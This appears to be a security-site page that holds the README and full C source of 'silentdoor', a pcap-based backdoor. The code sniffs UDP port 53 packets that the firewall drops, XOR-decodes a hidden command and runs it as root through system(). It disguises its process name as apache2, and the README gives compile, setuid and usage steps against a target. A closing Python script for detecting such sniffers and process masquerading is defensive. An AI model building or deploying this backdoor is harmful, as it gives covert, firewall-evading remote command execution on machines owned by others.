Written in C
-[ Packet Sniffing Backdoor Example
-[ written by drraid at gmail dot com
-[ for dtors.ath.cx & drraid's sec labs
--
-[ big middle finger to microsoft
-[ GNU GPL'd code

This is a dirty tool. A poorly written dirty tool ... (I'm sorry there are
almost no comments in it). Just say no.

The point of this program is to demonstrate a connectionless backdoor that
gets past the local netfilter running on a Linux box. Many people said I was
full of shit when I told them a packet sniffer will read packets even if
netfilter drops them. With that in mind, if a packet sniffer were to sniff for
commands and run them as a backdoor, it could be sneaky evil ninja. No
connection would be noticed, and even if the local firewall dropped the packet
containing its commands, it would still do its duty. Now what if you encrypted
it so someone else sniffing wouldn't know what the packet was intended for?

This tool is not written well. It is not in its entirety and I am aware of
several bugs it has. I have left it this way and posted it because it does
function -- I would strongly recommend not using it without re-writing or
making changes.

Requirements:
  Linux (untested on other systems)
  GCC
  libpcap and libnet

Compiling:
  $ ./makedoor
  $ ./makekey

  *Should build two files*: silence and key

  then:
  # chmod +s silence

Running:
  # ./silence &

  The above runs the backdoor. Note it changes its process base name to:
    /usr/sbin/apache2 -k start -DSSL
  This is set by #define BASENAME in silentdoor.c

  If anything prints on the screen when run, i.e. a '<' character, then the
  backdoor failed (probably because you weren't root).

Using the key:
  # ./key ip.ip.ip.ip:53 "command to exec"

  runs the command.

  HERE'S THE CATCH: all output is printed to stdout of the remote machine.
  IT IS OUTPUT ON YOUR TARGET BOX -- someone will notice if you start causing
  issues. This is one of those bugs ;D

  Another is if you run a program like 'login' for the command to exec, you
  will probably lose control of the backdoor until/if it restarts.

CONCLUSION: It is possible to have a pcap based backdoor.

This stuff is GNU GPL and it is included in the folder with the sources n stuff.

contact: drraid [at] gmail

SOURCE (silentdoor.c)

/*
 * PCAP-BASED SNIFFING BACKDOOR "Silent Backdoor" -- connectionless
 * written by drraid, drraid @ gmail
 *
 * Reads from encrypted UDP port 53 packet, even if the packet is
 * dropped by local firewall >;]
 *
 * This is horrible code. It functions but is buggy. Meant more as a
 * 'demo'. Read the README yo
 *
 * sup to 503, dtors.ath.cx, syncrew, #coder-underground, bash, kaptin,
 * vershun, poof, maru and other crazy bastards
 *
 * as always, BIG MIDDLE FINGER TO MICROSOFT
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <pcap.h>
#include <netdb.h>

#define PASS     "leet"                               /* 4-byte repeating XOR key */
#define BASENAME "/usr/sbin/apache2 -k start -DSSL"   /* what argv[0] is rewritten to */

/* pcap callback: runs once for every captured frame that matched "udp port 53" */
void in_pkt(u_char *other_stuff, const struct pcap_pkthdr *pkt_head, const u_char *packet)
{
    int i, v;
    char *ptr1, *ptr2;
    char pktstore[1024];
    char tempbuf[1024];
    char decrypts[1024];

    memset(tempbuf, '\0', sizeof(tempbuf));
    memset(pktstore, '\0', sizeof(pktstore));
    memset(decrypts, '\0', sizeof(decrypts));

    /* copy the payload after a fixed 44-byte header offset, capped to the buffer */
    v = (pkt_head->caplen - 44);
    memcpy(pktstore, packet + 44, (v = (v < (sizeof(pktstore) - 1) ? v : (sizeof(pktstore) - 1))));

    /* build a key stream by repeating PASS across the payload length */
    for (i = 0; i <= (v + (v % 4)); i += 4)
        strncat(tempbuf, PASS, 4);

    /* XOR "decrypt" */
    for (i = 0; i < v; ++i)
        decrypts[i] = (pktstore[i] ^ tempbuf[i]);

    /* the command is whatever sits between the "-dc$" and "$dc" markers;
       it goes straight to system(), and its output lands on local stdout (see README) */
    if (NULL != (ptr1 = strstr(decrypts, "-dc$"))) {
        if (NULL != (ptr2 = strstr(ptr1, "$dc"))) {
            memset(tempbuf, '\0', sizeof(tempbuf));
            strncpy(tempbuf, ptr1 + 4, (ptr2 - (ptr1 + 4)));
            system(tempbuf);
        }
    }
}

int catchpacket(void)
{
    char errbuf[PCAP_ERRBUF_SIZE];
    char filter_string[] = "udp port 53";
    pcap_t *sniff_session;
    struct bpf_program filter;
    bpf_u_int32 mask;
    bpf_u_int32 net;

    /* NULL device = let libpcap pick the interface; any failure prints '<' (see README) */
    if (-1 == pcap_lookupnet(NULL, &net, &mask, errbuf)) {
        printf("\n<\n");
        exit(0);
    }
    if ((sniff_session = pcap_open_live(NULL, BUFSIZ, 1, 0, errbuf)) == NULL) {
        printf("\n<\n");
        exit(0);
    }

    pcap_compile(sniff_session, &filter, filter_string, 0, net);
    pcap_setfilter(sniff_session, &filter);
    pcap_loop(sniff_session, 0, in_pkt, 0);   /* loops forever, calling in_pkt per packet */

    return (0);
}

int main(int argc, char *argv[])
{
    int x;

    strcpy(argv[0], BASENAME);   /* cosmetic rename: changes what ps shows, not comm or exe */
    setuid(0);
    setgid(0);
    x = catchpacket();

    return (0);
}
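Two host-side traces of the program above can be checked from /proc without touching the firewall at all: the AF_PACKET socket that libpcap opens is listed in /proc/net/packet no matter what netfilter drops, and the strcpy(argv[0], BASENAME) rename changes only the argv strings, so /proc/PID/comm and /proc/PID/exe still name the real binary. The following Python audit script is an added example written for this page, not part of drraid's tool; the /proc/net/packet row and the process values it is checked against are constructed, and the function names are my own.

```python
import os

# Constructed sample of /proc/net/packet (one row per AF_PACKET socket): Type 3 =
# SOCK_RAW, Proto 0003 = ETH_P_ALL, a libpcap-style capture on ifindex 2, inode 40217.
SAMPLE_PACKET_TABLE = (
    "sk       RefCnt Type Proto  Iface R Rmem   User   Inode\n"
    "ffff9a2b3c4d5e60 3      3    0003   2     1 0      0      40217\n"
)

def packet_socket_inodes(table_text):
    """Socket inodes in a /proc/net/packet dump; netfilter rules never hide these."""
    inodes = set()
    for line in table_text.splitlines()[1:]:           # skip the column header
        fields = line.split()
        if len(fields) >= 9 and fields[8].isdigit():
            inodes.add(int(fields[8]))
    return inodes

def socket_owners(inodes, proc="/proc"):
    """Map each wanted socket inode to the pids whose fd table links to it."""
    owners = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        fd_dir = os.path.join(proc, pid, "fd")
        try:
            links = [os.readlink(os.path.join(fd_dir, fd)) for fd in os.listdir(fd_dir)]
        except OSError:                                # exited, or not ours to read
            continue
        for target in links:                           # fd links look like socket:[40217]
            if target.startswith("socket:[") and int(target[8:-1]) in inodes:
                owners.setdefault(int(target[8:-1]), set()).add(int(pid))
    return owners

def is_masquerading(cmdline, comm, exe):
    """argv[0] names a program matching neither /proc/PID/comm nor /proc/PID/exe.
    strcpy(argv[0], ...) rewrites only the argv strings; comm and exe keep the truth."""
    argv0 = cmdline.split(b"\0")[0].decode("utf-8", "replace")
    claimed = os.path.basename(argv0.split()[0]) if argv0.strip() else ""
    return bool(claimed) and (claimed[:15] != comm.strip()[:15]   # comm is 15 chars max
                              and claimed != os.path.basename(exe))

def audit(proc="/proc"):
    """Live check: (pid, masquerading?) for each process holding a capture socket."""
    with open(os.path.join(proc, "net", "packet")) as f:
        owners = socket_owners(packet_socket_inodes(f.read()), proc)
    out = []
    for pid in sorted({p for pids in owners.values() for p in pids}):
        d = os.path.join(proc, str(pid))
        cmdline = open(os.path.join(d, "cmdline"), "rb").read()
        comm = open(os.path.join(d, "comm")).read()
        out.append((pid, is_masquerading(cmdline, comm, os.readlink(os.path.join(d, "exe")))))
    return out
```

Run audit() as root so every process's fd and exe links are readable; a legitimate sniffer (tcpdump, a monitoring agent) shows up too, so the masquerading flag is what separates the two.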